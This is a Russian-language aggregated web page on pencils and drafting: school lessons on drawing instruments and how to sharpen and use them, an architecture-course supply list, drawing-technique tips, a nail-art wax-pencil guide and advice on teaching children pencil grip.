53 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Как подготовить к работе карандаш

2. Чертежные инструменты, материалы и принадлежности. Организация рабочего места

2.1. Инструменты для выполнения чертежей. Что необходимо будет вам для выполнения чертежей в школе?

Готовальня. Готовальня—это комплект чертежных инструментов, уложенных в футляр. Обычно в готовальню входят круговой (рис. 11, а) и разметочный (рис. 11, б) циркули, рейсфедер для работы тушью, удлинитель к круговому циркулю и другие инструменты.

Циркули. Из наконечника графитовый стержень должен выступать на 5. 7 мм. Концы иглы и пишущего стержня при работе циркулем, как и концы игл разметочного циркуля, располагают на одном уровне (рис. 11).

Рис. 11. Циркуль чертежный: а — круговой; 6 разметочный

Рейсшина. Во время работы поперечную планку рейсшины прижимают к левой кромке чертежной доски (рис. 12). С помощью рейсшины проводят горизонтальные и наклонные линии.

Рис. 12. Чертежная доска и рейсшина

Чертежные угольники (рис. 13). Вместе с линейкой или рейсшиной чертежные угольники применяют для проведения перпендикулярных и параллельных линий и построения некоторых углов.

Рис. 13. Угольники чертежные: а — с углами 90, 45, 45°; б — с углами 90, 30, 60°

2.2. Чертежные материалы и принадлежности. К чертежным материалам и принадлежностям относят бумагу, карандаши, резинки, кнопки.

Чертежная бумага. Для черчения используют плотную белую нелинованную бумагу.

Карандаши. Для выполнения графических работ вам необходимы карандаши марки Т (твердые), М (мягкие) и ТМ или НВ, СТ (средней твердости). Чем больше число, стоящее рядом с буквой, тем тверже или мягче этот карандаш.

Правильно подготовленный к работе карандаш показан на рисунке 14. Его сначала затачивают острым перочинным ножом или в специальной точилке. После этого стержень заостряют с помощью шлифовальной шкурки—твердый на конус, а мягкий в виде лопаточки.

Рис. 14. Правильно заточенные карандаши

Все чертежные инструменты и материалы надо держать чистыми и исправными, от этого зависит качество выполнения чертежа.

2.3. Как работать чертежными инструментами. Прямые линии сначала проводят вдоль кромки линейки или угольника без нажима твердым, остро заточенным карандашом, а затем обводят карандашом средней твердости. При этом карандаш немного наклоняют в сторону движения, как показано на рисунке 15. Горизонтальные линии проводят слева направо, вертикальные и наклонные — снизу вверх.

Рис. 15. Приемы проведении линий: а — горизонтальных; б — вертикальных; в — наклонных

Чтобы получить более четкие и ровные линии при обводке, карандаш по этим линиям можно вести повторно и в обратном направлении. Угольник при проведении вертикальных и наклонных линий передвигают вдоль кромки рейсшины или линейки слева направо, а при проведении горизонтальных линий —сверху вниз.

Для проведения дуг окружностей ножку циркуля ставят в центр. Циркуль вращают за головку большим и указательным пальцами в направлении движения часовой стрелки (рис. 16). Короткая ножка с карандашной вставкой и игла циркуля в рабочем положении должны быть параллельны между собой. Во время вращения циркуль можно немного наклонять вперед.

Рис. 16. Проведение окружности циркулем

При откладывании отрезков разметочным циркулем не следует на него сильно нажимать, чтобы не оставлять проколов на бумаге.

2.4. Оборудование рабочего места. От правильной подготовки рабочего места во многом зависит качество чертежа.

Свет на чертеж должен падать слева сверху. В этом случае тени от инструментов и рук не будут мешать работе.

Выполняя чертеж, следует сидеть прямо, не горбясь. Расстояние от глаз до чертежа должно быть примерно 300 мм,

У чертежной доски оставляют только те инструменты, которые нужны для работы в данное время. При этом готовальня, угольники, карандаши и резинка должны лежать справа, а книга— слева. Чертежная доска должна иметь небольшой наклон. В этом случае легче работать, так как не нужно сильно наклоняться над чертежом.

В конструкторских бюро чертежи выполняют с помощью чертежного прибора, который заменяет измерительную линейку, угольник и транспортир (рис. 17).

Рис. 17. Чертежный станок с прибором

Работа конструктора над чертежом весьма трудоемка. Поэтому в последнее время используют устройства, которые по заданной программе автоматически выполняют все графические построения. Такие автоматические устройства для выполнения чертежей называют графопостроителями.

Для построения чертежей применяют и электронно-вычислительные машины (ЭВМ). На смену чертежной доске все чаще приходит телеэкран (дисплей). Конструктор задает нужные данные, а ЭВМ осуществляет автоматический поиск наиболее рационального решения.

  1. Как подготовить к работе чертежный циркуль? Как проводят им дуги окружностей?
  2. Для чего нужна рейсшина? Как с ней работать?
  3. Как подготовить к работе карандаш? Какие бывают карандаши по твердости?
  4. Как правильно подготовить рабочее место для черчения?

В рабочей тетради по заданию учителя, пользуясь чертежными инструментами, проведите вертикальные, горизонтальные и наклонные линии, а также окружности.

Указание к работе. Старайтесь проводить все линии одинаковой толщины. Красиво расположите группы линий на листе тетради.

Материалы, принадлежности, чертежные инструменты. Подготовка их к работе.

Гипермаркет знаний>>Черчение 9 класс>>Черчение: Материалы, принадлежности, чертежные инструменты. Подготовка их к работе.

На уроках черчения вам потребуются различные материалы, инструменты и принадлежности, которые необходимо будет подготовить к работе.

Бумага является основным материалом, на котором выполняются графические и текстовые конструкторские документы. В зависимости от назначения и срока хранения чертежи могут выполняться на чертежной бумаге, кальке, миллиметровой бумаге, писчей бумаге в клетку. Перед выполнением графической работы бумагу необходимо проверить: чистый белый лист не должен содержать замятии, складок, морщин; не следует использовать бумагу, которая лохматится под действием резинки (ластика).

Запомните:
1. Графические изображения выполняются на гладкой стороне бумаги.
2. Во время выполнения чертежей необходимо следить за чистотой рук, чтобы не испачкать чертеж.
3. Свободное поле чертежа рекомендуется закрывать чистым листом бумаги, чтобы графитная пыль не пачкала чертежную бумагу.

Карандаши играют важную роль в выполнении чертежей, поскольку качество графического изображения зависит от правильного выбора степени их твердости. Промышленностью выпускаются наборы карандашей различной твердости. Степень твердости обозначается буквами и цифрами, которые наносятся на карандаш:

М, 2М,| ЗМ, 4М, 5М, 6М, В — мягкие, Т, 2Т, ЗТ, 4Т, 5Т, 6Т, 7Т, Н — твердые, ТМ, НВ, СТ— средней твердости.

Буквой обозначается мягкость или твердость карандаша. Числом обозначается степень мягкости или твердости. Чем больше число, стоящее перед буквой, тем тверже или мягче карандаш. На уроках черчения в школе будем использовать карандаши, обозначение которых указано в рамках.

Выполнение чертежа начинают карандашами Т, 2Т, нанося линии построений, а обводят чертеж карандашами М, 2М.

Оттачивают карандаш с того конца, где нет надписи. Это позволяет сохранить его маркировку. Качество проводимых линий зависит от того, как заточен грифель карандаша. На рис. 8, а, б показаны варианты подготовки карандашей к работе. Коническую заточку стержня производят для твердых карандашей. Затачивание грифеля в виде лопаточки осуществляется для мягких карандашей. При работе графитовый стержень стачивается, изменяя толщину линий чертежа, поэтому его необходимо подтачивать на наждачном оселке (рис. 8, в).


Подготовка карандаша к работе

Проводить линии надо не спеша, сохраняя один и тот же нажим. Не следует проводить линии длиннее, чем требуется. При проведении линий нельзя наклонять карандаш над линейкой или от нее, так как линия получится неровной.

Положение рук при проведении линий показано на рис. 9.

Положение рук при проведении линий

Резинка (ластик) используется для удаления ненужных изображений, надписей. Ластик должен быть мягким и иметь острые края. Острым краем удобно удалять линии, не затрагивая соседние.

Готовальней называется набор чертежных инструментов и принадлежностей, уложенных в футляр.Готовальни в зависимости от их назначения бывают разных типов и отличаются друг от друга количеством и качеством входящих в них инструментов. Рассмотрим содержимое готовален.

В готовальне хранятся циркули. Они бывают различными по форме и назначению.

Циркуль-измеритель применяется для измерения, откладывания и деления отрезков. Он имеет две шарнирно соединенные ножки с иглами (рис. 10).

Перед работой циркулем-измерителем необходимо иглы выставить на одном уровне. Все действия циркулем-измерителем выполняются одной рукой.

Круговой циркуль применяется для проведения окружностей средних и больших диаметров. В одной из ножек он имеет карандашную вставку, в другой — иглу (рис. 11, а).

Стержень карандашной вставки должен выходить наружу на 5-7 мм. В круговом циркуле ножка с грифелем должна быть несколько длиннее ножки с иглой, что облегчает проведение окружностей (рис. 11, б, в).

Кронциркуль — малый циркуль для проведения окружностей малого диаметра от 0,5 до 8 мм.

Центрик — кнопка с углублением для иглы циркуля. Используется для проведения нескольких окружностей или их дуг из одного центра. Центрик вкалывается в центр окружностей, что предотвращает появление порывов бумаги.

Готовальня также может содержать инструменты, предназначенные для работы тушью.

Линейка — простейший чертежный инструмент, служащий для проведения прямых линий и измерения размеров. В работе удобнее использовать тонкие прозрачные линейки (рис. 12).

Приступая к работе, необходимо проверить рабочую сторону линейки (грань, на которой штрихами нанесена измерительная шкала). Для этого вдоль рабочего ребра проводят тонкую линию. Перевернув линейку, совмещают ее рабочую сторону с проведенной линией и проводят вторую линию. Если обе линии слились в одну, то край линейки прямолинеен.

Рейсшина — чертежная линейка для проведения параллельных линий. Состоит из линейки с поперечиной, прижимаемой к кромке чертежной доски рукой. Обычно одна из планок поперечины делается подвижной для проведения параллельных линий под любым углом к кромке доски (рис. 13).

В настоящее время используются и другие виды рейсшин, например, инерционные, которые сочетают в себе свойства универсальной линейки, прибора для штриховки и транспортира.

Чертежная доска с рейсшиной

Все горизонтальные параллельные линии проводятся с помощью рейсшины простой (рис. 14) или инерционной линейки.

В практике выполнения чертежей используются два угольника с углами 90°, 45°, 45° и с углами 90°, 30°, 60° (рис. 15, а). Удобен в работе и раздвижной угольник (рис. 15, б).

Перед использованием угольников необходимо проверить прямолинейность его сторон (осуществляется тем же способом, что и проверка прямолинейности линейки) и наличие прямого угла угольника. Способ проверки угольника на наличие прямого угла изображен на рис. 16.

Проверка наличия прямого угла

Для проведения вертикальных и наклонных параллельных линий можно использовать рейсшину с угольником (рис. 17), два угольника или линейку с угольником.

Способы проведения параллельных линий

Транспортир — инструмент для градусного измерения и вычерчивания углов, изготавливаемый из жести или пластмассы (рис. 18).

Лекало — тонкая пластинка с криволинейными кромками, служащая для вычерчивания кривых (лекальных) линий, которые нельзя провести с помощью циркуля. Разновидности лекал представлены на рис. 19.


Лекала

Лекала используются для обводки лекальных кривых, ранее проведенных от руки по точкам (рис. 20). Для обводки линии подбирают лекала с такими кромками, чтобы можно было обвести как можно больший участок кривой.

Чертежная доска — доска, изготовленная из мягких пород древесины, к которой прикрепляют лист чертежной бумаги с помощью кнопок.

Н.А.Гордеенко, В.В.Степакова — Черчение, 9 класс
Отослано читателями из интернет-сайтов

Если у вас есть исправления или предложения к данному уроку, напишите нам.

Если вы хотите увидеть другие корректировки и пожелания к урокам, смотрите здесь — Образовательный форум.

ИНСТРУМЕНТЫ, МАТЕРИАЛЫ И ПРИНАДЛЕЖНОСТИ ДЛЯ ЧЕРЧЕНИЯ;

Качество выполненной графической работы во многом зависит от качества используемых материалов и инструментов, поэтому к их правильному выбору надо отнестись достаточно ответственно. Для выполнения чертежа на уровне, соответствующем профессиональному обучению, необходимо иметь набор следующих принадлежностей (Рис.1):

1. Чертежная доска для крепления рейсшины на роликах и бумаги. Для этого можно использовать обычную чертежную доску из сплошной (можно прессованной) древесины или подрамник. Рис. 1 (1) . Подрамник значительно легче сплошной деревянной доски, так как он представляет собой лист фанеры с обвязкой из деревянных брусков. Размер подрамника для черчения на формате A3 ( Основной формат учебных заданий) рекомендуется выбирать в пределах от 55×55 до 55×75 см. Основное требование к подрамнику — его поверхность должна быть ровной и гладкой. Не рекомендуется использовать подрамники меньшего размера, т.к. возникнут трудности выполнения чертежа при различной ориентации на нем листа бумаги (горизонтальная и вертикальная). Не рекомендуется также использовать пластиковые чертежные доски в связи с небольшим сроком их качественного использования и малых размеров.

2. Рейсшина. Пластиковая линейка с двумя роликами на концах (рейка) длинной от 55 до 75 см. С помощью четырех скобок или гвоздей с широкой шляпкой (обойные гвозди) и капроновой лески она крепится на подрамник и, передвигаясь строго параллельно самой себе, обеспечивает необходимую точность черчения. Рис.1 (2). Для точного передвижения леска должна быть достаточно туго натянула. Крепление рейки к подрамнику описано ниже.

3. Готовальня. Рис.1 (3). Все инструменты, в том числе входящие в состав готовальни, можно условно разделить на учебные, широкого применения, полупрофессиональные и профессиональные. Учебные инструменты служат для первого знакомства и используются в основном детьми. Инструменты широкого применения, хотя и могут выполнять возложенные на них функции, однако, предназначены для использования от случая к случаю и отличаются малой надежностью, долговечностью и, соответственно, относительно дешевы.

Слушателям подготовительных курсов и студентам Архитектурного института рекомендуется использовать полупрофессиональный или профессиональный инструмент, хотя последний достаточно дорог.

Неспециалисту трудно на первый взгляд отличить готовальню широкого применения от полупрофессиональной (Рис.2а), однако существуют косвенные признаки, позволяющие это сделать.

Во-первых, инструменты готовальни должны содержать как можно меньше деталей, изготовленных из пластмассы. Особенно это относится к рабочей части рейсфедеров и верхней части циркулей. (Рис.26).

Во-вторых, ножки циркулей и измерителей должны быть монолитного сечения, а не изготовленные путем штамповки и имеющие вид гнутого профиля. Створки рейсфедеров также не должны быть штампованными. (Рис.Зг).

В готовальню должны входить следующие инструменты:

A) Большой круговой циркуль со сменными вставками: карандашная вставка для черчения окружностей карандашом и рейсфедерная вставка для обводки карандашных линий тушью. (Рис. За).

Б) Маленький круговой циркуль или кронциркуль и «балеринка» с карандашными и рейсфедерными вставками для проведения окружностей малых радиусов карандашом и тушью. (Рис.36).

B) Измеритель (разметочный или делительный циркуль) для переноса и точной разметки размеров на чертеже. (Рис.За).

Г) Прямой рейсфедер для черчения тушью прямых линий. Желательно иметь два рейсфедера (для тонких и толстых линий). (Рис.Зв).

Кроме того, в готовальню может входить удлинительная ножка к круговому циркулю для проведения окружностей больших размеров и другие инструменты.

Как правило, почти все готовальни, как отечественного так и зарубежного производства, нуждаются в дополнительной доводке: регулировке степени зажима ножек циркулей, проверке остроты иголок циркулей и измерителей, а также проверке тождественности формы и качества заточки створок рейсфедеров. В случаях неполадок рейсфедеры и иголки следует заточить на точильном бруске с правкой на бритвенном оселке. Заточка инструментов требует специального навыка и профессиональных знаний.

Инструменты хранят всегда в готовальне. После окончания работы инструменты рекомендуется мыть и протирать кусочком мягкой ткани или замши. Готовальню время от времени чистят от пыли мягкой щеточкой.

4. Угольники. Рис.1 (4). Для проведения прямых, параллельных, перпендикулярных и наклонах линий используются угольники с углами 45, 30 и 60°. Угольники могут быть изготовлены как из дерева, так и из пластмассы. Хотя деревянные угольники меньше пачкают бумагу, однако, их основной недостаток — частое несоответствие углам 30: °, 45°, 60°, особенно 90°, не позволяющее выполнять точные построения.

Пластмассовые угольники в этом отношении во многом точнее. Кроме того, в последнее время появись угольники, рабочие стороны которых имеют выбранную четверть или фаску, что облегчает обводку линий тушью. Им и следует отдать предпочтение. Длина большей стороны угольника должна составлять около 300 мм. В начальных стадиях архитектурного черчения вполне достаточно иметь два больших угольника, в дальнейшем для построения и обводки коротких линий необходимо дополнительно приобрести угольники меньшей величины с углами 30° и 45°.

5. Масштабная линейка не прозрачная размером около 30 см для откладывания всех размеров на чертеже только по этой линейке, так как на разных линейках и угольниках величины делений могут значительно отличаться. Рис,1(5). К чертежным материалам и принадлежностям относят также карандаши, бумагу, ластики и т.д. 6. Чертежная бумага. Рис.1

6. Для черчения используют бумагу формата A3 (размером 297×420 мм) в стандартной папке «Для черчения» или 1/4 листа ватмана формата А1. При этом необходимо обратить внимание на ее качество. Бумага должна быть: плотная, белая, гладкая, но не мелованная. Лучше использовать бумагу, выпускаемую Санкт-Петербургской бумажной фабрикой «Гознака». Хорошая бумага не должна лохматиться при трении резинкой, линии проведенные тушью должны быть ровными, четкиими и не расплываться.

7. Карандаши. (Рис.4). Для вычерчивания работ под обводку тушью используют карандаши, которые могут быть разделены на три типа. Обыкновенные деревянные, цанговые с грифелем диаметром 2-2,2 мм и механические с грифелем диаметром 0,3, 0,5 и 0,7 мм. Для проведения линий различной толщины и яркости чертежнику необходимо иметь набор карандашей (или грифелей) твердостью от ТМ до 3-4Т, в зарубежной маркировке от НВ до 3-4Н.

Деревянные карандаши наиболее легкие и достаточно дешевые, однако необходимо иметь в виду, что их надо правильно подготовить: сначала заточить острым ножом на длину 25-30 мм, а затем грифель (стержень) длиной 8-10 мм заострить с помощью наждачной бумаги в форме конуса. Рис.4(1).

Цанговые карандаши тяжелее деревянных, но их подготовка занимает меньше времени, т.к. необходимо заострить только грифель. Рис.4(2).

И наконец, механические карандаши. Они вообще не требуют заточки и позволяют исключить из рабочего процесса время на их подготовку. Однако начинающим чертить следует пользоваться первое время деревянными или цанговыми карандашами до тех пор, пока у них не выработается достаточно уверенная «моторика движений». Механические карандаши, особенно с грифелем 0,3 мм, требуют более осторожного и умелого обращения, и поэтому переходить на работу ими лучше после черчения обычными карандашами. Рис.4(3).

8. Ластики для стирания карандашных линий -мягкие, белые, не повреждающие поверхность бумаги. Рис.1 (7). Нельзя использовать цветные резиновые ластики, т.к. они сильно повреждают поверхностный слой бумаги и, в дальнейшем, на этом месте может растечься тушь. Цветные ластики сделанные из пластика, как правило, оставляют неудаляемые цветные следы, что недопустимо для качественного выполнения чертежа.

9. Мягкая щетка или кисть для сметания катышков после использования ластика.

10. Скотч для крепления листа бумаги к подрамнику может быть как на бумажной, так и на лавсановой основе. (Лучше на лавсановой). Рис.1 (8).

11. Тушь отечественная черная, лучше марки «Гамма», которая при необходимости, для проведения тонких линий разбавляется. Рис.1 (9). Не следует для работы рейсфедером использовать специальную тушь для рапидографов.

12. Ручка с чертежным стальным пером №41 (или №801) для выполнения надписей. Рис.1 (10).

13. Лезвия для срезания ошибочных линий, проведенных тушью. Рис.1 (11).

14. Тряпочка из простой хлопчатобумажной ткани для протирания инструмента от туши. Рис.1 (12).

15. Макетный нож. Рис.1 (13). Для заточки деревянных карандашей, обрезки бумаги и т.п.

16. Рапидографы и изографы. Рис.1(14). Кроме традиционных чертежных инструментов, можно использовать рапидографы и изографы. Рапидографы или изографы выпускаемые, как правило, зарубежными фирмами, такими как Rotring и Faber Castell, являются высокотехнологичным продуктом, позволяющим выполнять быстро и качественно чертежные работы. И хотя они в значительной степени повышают скорость выполнения работ, т.к. их, в отличие от рейсфедеров, не надо постоянно заполнять тушью, однако имеют определенные особенности, требующие осторожности, определенного знания и умения в их применении.

Качественное выполнение чертежа изографом (это же относится и к рапидографу) может быть обеспечено только при условии, что он заправлен тушью, изготовленной той же фирмой, предназначенной именно для него и, главное, бумага, на которой выполняют чертеж, предназначена именно для этого типа туши. Не следует заправлять изографы отечественной тушью для графических работ т.к. это может привести к их поломке. Эти условия не всегда возможно соблюсти (особенно подобрать бумагу, соответствующую туши). Поэтому импортная тушь для изографов часто растекается на отечественной бумаге, даже высокого качества (такой как «Гознак»). Не говоря уже о наличии на рынке огромного количества поддельной туши и изографов, изготовленных неизбежными «фирмами». Поэтому, используя, изограф (или рапидограф), надо помнить, что качество выполненного чертежа может оказаться ниже, чем у чертежа, выполненного рейсфедером.

Кроме того, ученикам, впервые начинающим выполнение чертежей с тушью, следует начинать обучение с работы рейсфедером. Этот во многом универсальный инструмент (позволяющий обводить чертеж не только тушью, а, например, гуашью) требует правильной постановки руки. Он тотчас реагирует на все ошибочные действия в обращении с ним: неправильный наклон или непараллельность плоскости разреза щечек рейсфедера кромке линейки или угольника, чрезмерный или недостаточный нажим и т. п.

Каждое неправильное действие отзывается на качестве проводимой линии — кромки ее становятся рваными или меняется толщина.

Такая особенность рейсфедера позволяет оперативно вносить корректировки в процесс овладения тонкостями работы с ним и добиваться правильной постановки руки.

После освоения рейсфедера, что, как показывает практика, занимает 2-3 месяца напряженного обучения, можно перейти к выполнению чертежей

Секреты карандашных техник

Для рисунка карандашом лучше подходит бумага плотная, без фактуры, шероховатая. Фактурная бумага тоже может использоваться, но такой подход имеет свои достоинства и недостатки, поскольку в процессе штриховки карандаш в движении пролетает над ямками на бумаге, закрашивая только вершинки фактуры бумаги, таким образом практически самопроизвольно и без усилий получается интересная штриховка (воспроизводящая рисунок фактуры бумаги). Однако обратной стороной медали является неуправляемость подобного изображения, заштриховать полностью фактурную бумагу до тёмного будет трудно.

Иногда встречаются технические хитрости, которые применяют художники: несмотря на то, что работа выполняется на ровной бумаге, существуют инструменты, которые позволяют создавать на бумаге фактуру в нужных местах. Такой инструмент представляет собой что-то типа штампов с разным рисунком, с силой прижимаемых к листу. Или же под бумагу подкладываются поверхности с рельефом и бумага с усилием прокатывается по рельефу и образовывается фактура. При тушёвке в обоих случаях локально в нужном месте возникает оригинальная фактура, на которой легко появляется характерный рисунок.

ВЫБИРАЕМ КАРАНДАШ

Для рисования есть широкий спектр выбора простых карандашей. Делятся простые карандаши на: твёрдые и мягкие

Если разложить твёрдые и мягкие карандаши на координатной оси, то карандаш НВ (английская маркировка) или ТМ(русская маркировка) будет ноль. Карандаш В будет мягче, В1 ещё мягче, В2 ещё ит.д. В другую сторону от НВ пойдут твёрдые карандаши. Н твёрже, Н1 ещё твёрже, Н2 ещё и т.д.

Начинающим лучше пользоваться «нулевым» карандашом НВ или ТМ (Твёрдый-Мягкий). Беря карандаши разной твёрдости-мягкости, они не чувствуют нажима на карандаш. Привыкнув к среднему ТМ или НВ, они начинают лучше чувствовать нажим. Когда приходит понимание, рисовальщики сами добавляют в свой арсенал карандаши других мягкостей.

Твёрдые карандаши больше подходят для черчения. Так как они оставляют слабый серый цвет и царапают бумагу. А в рисунке всё-таки необходимо в тенях добавить темноты. Конечно, ТМ может справиться с этой задачей, но на это придётся потратить больше времени. Проще взять, например, В и добавить столько темноты сразу, столько нужно. И будет штриховка в один слой, а карандашом ТМ, придётся проложить несколько слоёв штриховки.

ЦВЕТНЫЕ КАРАНДАШИ

С цветными карандашами безумно приятно работать, отчасти из-за того, что ими легко манипулировать и управлять. От того, как вы наточили карандаш, как вы его держите и насколько сильно нажимаете на него, зависит какого эффекта вы добьетесь при рисовании. С помощью цветных карандашей вы сможете создать как мягкие сочетания, так и ослепительно яркие реалистичные текстуры. Однажды уловив основы, описанные ниже, вы сможете решить какая техника придаст объекту уникальные свойства. Техник в рисовании цветными карандашами очень много, столько же сколько и эффектов можно достичь с их помощью. Поэтому чем больше вы тренируетесь и экспериментируете, тем больше потенциала заметите на изображениях, которые вдохновляют вас.

Нажим

Рисование цветными карандашами отличается от рисования красками, вы не сможете просто набрать больше цвета на кончик, чтобы сделать его темнее. Поэтому, ваш главный инструмент — это сила нажима, когда вы накладываете цвет. Лучше всего начать со светлого, этим вы сохраните текстуру бумаги намного дольше. Со временем, вы разовьете механический навык менять силу нажатия на карандаш, чтобы добиться нужного эффекта.

И ЕЩЕ НЕСКОЛЬКО СЕКРЕТОВ

  • Чем меньше вы будете прибегать к резинке, тем свежее и приятнее будет рисунок. Не следует также злоупотреблять так называемой „тушевкой”, когда графит растирают на бумаге пальцем. Это сообщает рисунку безжизненный, скучный и однообразный вид. Наиболее типичной техникой рисунка простым графитным карандашом является штрих.
  • В процессе работы над рисунком отдельные вспомогательные линии, проведенные для первоначальной разметки и построения формы, постепенно уступают место штрихам. Штрихи, нанесенные то густо, то еле заметно, являются средством передачи тональных отношений, изображаемых форм.
  • Передавая в рисунке бесконечное разнообразие окружающих нас форм, мы можем извлечь из простого карандаша неисчерпаемые возможности, то варьируя нажим карандаша различной мягкости, то свободно меняя направление и длину штрихов.
  • Штрихи могут идти по вертикали, горизонтали, диагонали или же переплетаться между собой, они могут быть густыми или разреженными, четкими или мягкими, прямыми, изогнутыми, волнистыми и т. д. Но всегда, во всех случаях штрихи прокладываются не „сами по себе”, а для выявления изображаемой формы. Они как бы „лепят” данную форму в пространстве, и поэтому характер штрихов всегда зависит от характера формы, а также от материала изображаемого предмета. Рисуя предметы прямоугольные или округлые, вы по-разному будете наносить штрихи. Массивные и тяжелые предметы будете рисовать иначе, чем легкие и мягкие. По-иному вы положите штрихи, когда будете рисовать пейзаж или голову человека. Разные задачи требуют своей техники нанесения штриха.

Карандаш для стразов: как пользоваться, описание, фото

Если вы осваиваете тонкое искусство нейл-арта, наверняка уже успели убедиться в том, что для удобной работы необходим специализированный инструмент. Заточенными спичками, шпильками и иголками невозможно заменить качественные кисти, пинцеты и другие инструменты маникюрного мастера.

Один из маленьких помощников – карандаш для стразов. Это просто незаменимая вещь для выполнения всевозможных дизайнов! Наша статья расскажет об этом удобном инструменте, а также о том, как пользоваться карандашом для стразов.

Что это такое

Вам будет интересно: Рисунок на шеллаке — интересные идеи, особенности и рекомендации

Для начала разберемся, чем он не является. Некоторые полагают, что инструмент предназначен для крепления страз к поверхности ногтя. Это в корне неверное утверждение!

Изготавливают карандаши из парафина или воска, предназначены они исключительно для захвата и переноса камешков на ноготь.

Кончик карандаша липкий, за счет этого к нему и прилипает декоративный элемент. Чтобы с инструментом было удобно работать, его боковая поверхность покрыта бумагой, то есть к рукам он не прилипает.

Предназначение

Для каких материалов можно использовать этот инструмент? Очевидно, что для кристаллических и опаловых стразов. Именно на них и стоит потренироваться. Попробовав один раз, вы обнаружите, что мастера недаром хвалят это нехитрое приспособление – инструмент действительно легко справляется с кристаллами разных размеров и форм — и с плоскими, и с объемными.

Разобравшись, как пользоваться карандашом для стразов, вы сможете значительно облегчить себе труд и при работе с другими материалами. Остро заточенный носик легко ухватит мелкие бульонки, микроскопические пикси («алмазную крошку»), крупные блестки, камешки синджу, камифубуки, металлические элементы, сухоцветы и многие другие элементы декора.

Карандаш из воска или парафина станет прекрасной альтернативой пинцету. С его помощью можно усадить кристалл именно туда, куда нужно, хоть в самый центр композиции, и при этом остальные элементы двигать не придется.

Выбор и подготовка к работе

В отечественных магазинах товаров для нейл-арта выбор восковых карандашей не так уж велик. Откровенно говоря, в огромном ассортименте и смысла-то никакого нет – карандаши разных производителей практически не отличаются друг от друга. Отдайте предпочтение тому, который удобно лежит в руке.

Большинство вариантов продаются незаточенными. Перед началом работы нужно заострить носик. Не стоит делать это с помощью лезвия или ножа, так вы получите рваный, неровный край. Лучше всего для заточки восковых карандашей подходит косметическая точилка, причем не тонкая, а широкая, предназначенная для помады-карандаша.

Как пользоваться восковым карандашом для стразов

Перед выполнением дизайна отсыпьте стразы из баночки или пакета в удобное плоское блюдце или специальную треугольную пиалу. Следите, чтобы камешки упали декоративной стороной кверху. Прижмите карандаш к выбранному стразу и перенесите кристалл на ноготь.

Крепить стразы можно на специальный клей, прозрачный моделирующий гель или густую каучуковую базу. Усадив кристалл в нужное место, просто уберите карандаш – гелевый материал удержит страз на ногте.

Вот и все премудрости. Как видите, пользоваться карандашом для стразов совсем не сложно.

Рекомендации по хранению и уходу

Разобравшись, как пользоваться карандашом для стразов для ногтей, узнаем о том, как продлить срок службы инструмента. Храните его в стакане острой стороной кверху, чтобы кончик не тупился о дно и не собирал на себя пыль.

Рекомендуется использовать колпачок. Если его не было в наборе, вы легко можете подобрать соразмерный, ведь по диаметру восковой инструмент совпадает с канцелярскими ручками и косметическими карандашами.

Консультация «Как научить ребенка держать карандаш»

Мария Сосова
Консультация «Как научить ребенка держать карандаш»

Консультация: «Как научить ребенка держать карандаш»

Как научить ребенка правильно держать карандаш? Как выглядит правильный захват карандаша? Какие использовать упражнения и занятия для развития пальчиков малыша? Верно ли, что от того насколько правильно ребенок держит ручку, зависит и его почерк, и его осанка? Все эти вопросы ставят перед собой заинтересованные родители.

Для начала решим, действительно ли это необходимо, научить ребенка правильно держать карандаш? Учителя начальной школы обращают внимание на то, что это важно, потому что при правильной позиции пальцев рука меньше устаёт. Это, абсолютно верно, так как если указательный палец наверху, то на него приходится основная нагрузка, а он лучше всех приспособлен для выполнения мелких и точных движений.

Знакомить малыша с тем, как нужно держать карандаш, мы можем с того момента, когда он начинает использовать карандаш или кисточку по назначению, тогда нужный навык формируется автоматически.

Если же ситуация «запущена», и малышу уже 4, 5, 6 лет, то нам придётся действовать сразу в нескольких направлениях.

1. Первое, и самое главное,- необходимо создать положительную мотивацию для усилий ребёнка, чтобы он сам, и очень сильно, был заинтересован в достижении цели. Для этого маме нужно будет подключить всю свою смекалку, ведь только она знает, что привлечёт малыша. Может быть, это пример старшего брата – школьника, или пример отца, или ссылка на то, что так пишут все взрослые, или обещание подарить настоящую школьную ручку, или рассказ о том, что карандаш – это корабль, а пальцы – капитан, старший помощник и боцман, и у каждого из них своя работа и своё место на корабле. Фантазируйте, пробуйте, всё в ваших руках. И не забывайте хвалить и поддерживать дошкольника, не жалейте для этого эмоций, искренне радуйтесь его достижениям.

2. Второе – привлеките на свою сторону и сделайте союзниками всех взрослых, которые имеют отношение к письменной и рисовальной деятельности ребёнка, чтобы и они поддерживали его усилия.

3. И, наконец, третье– чисто технические средства, «заставляющие» правильно располагать пальцы на карандаше: трёхгранные карандаши и ручки, специальные насадки на карандаш.

Большинство детей сначала учатся держать карандаш в кулаке, захватив его всей ладонью. Неудивительно, что некоторые 3-летние карапузы держат карандаш именно так. Ведь их никто и никогда не учил правильно располагать пальчики. А рисовать гораздо удобнее, когда карандаш правильно лежит в руке.

Правильный захват карандаша выглядит так: карандаш лежит на среднем пальце, указательный палец придерживает карандаш сверху, а большой палец — с левой стороны. Все три пальца слегка закруглены и не сжимают карандаш сильно. Указательный палец может легко подниматься, и при этом карандаш не должен падать. Безымянный и мизинец могут находиться внутри ладони или свободно лежать у основания большого пальца. Во время рисования рука опирается на верхний сустав загнутого внутрь мизинца.

Если малышу нет еще и 3 лет, просто регулярно вкладывайте карандаш, или фломастер, или кисточку в пальчики правильно. А после 3 лет можно показать крохе нехитрый прием: щепотью (большим, указательным и средним пальцами) малыш должен взять за не заточенный конец карандаша и передвигать пальцы к другому концу скользящим движением, опираясь заточенным концом о поверхность стола. Когда пальчики будут почти у грифеля, они обязательно правильно распределятся. Зафиксируйте внимание ребенка на том, как держать карандаш «по-новому».

Немного тренировки, и малыш сам будет следить за своими пальчиками.

Есть и другой неплохой способ научить ребенка правильно брать в руки карандаш. Раскрываете правую ручку ребенка ладошкой вниз и вкладываете карандаш нижней его частью между большим и указательным пальцами, затем просите малыша сжать пальцы. Обычно почти все дети берут карандаш правильно.

Если не получилось с первого раза — немного подправьте положение пальцев. Если заметили, что карандаш снова в кулаке — остановите рисование и переложите его правильно. После десятка таких перекладываний даже годовалый ребенок начинает правильно держать карандаш.

Занятия, способствующие развитию захвата щепотью:

• Побуждайте ребенка брать мелкие предметы кончиками пальцев (пинцетный захват) и выпускать их, складывая в какую-то емкость.

• Можно играть с бельевыми прищепками, складывать бумагу или вытаскивать салфетки из пачки, откручивать крышечки от тюбиков с зубной пастой большим, указательным и (иногда) средним пальцами.

